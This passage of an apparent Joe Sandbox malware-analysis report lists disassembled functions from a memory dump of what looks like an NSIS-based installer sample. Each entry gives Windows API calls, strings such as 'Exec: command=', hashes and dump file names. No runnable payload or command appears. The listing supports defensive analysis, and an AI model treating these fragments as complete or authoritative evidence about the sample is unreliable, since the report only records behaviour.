                                                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3734993849-2769509956
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1033533793-945480824
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                                                      • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                                                      • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00017A00,00000064,?), ref: 00403295
                                                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3540041739-1813061909
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
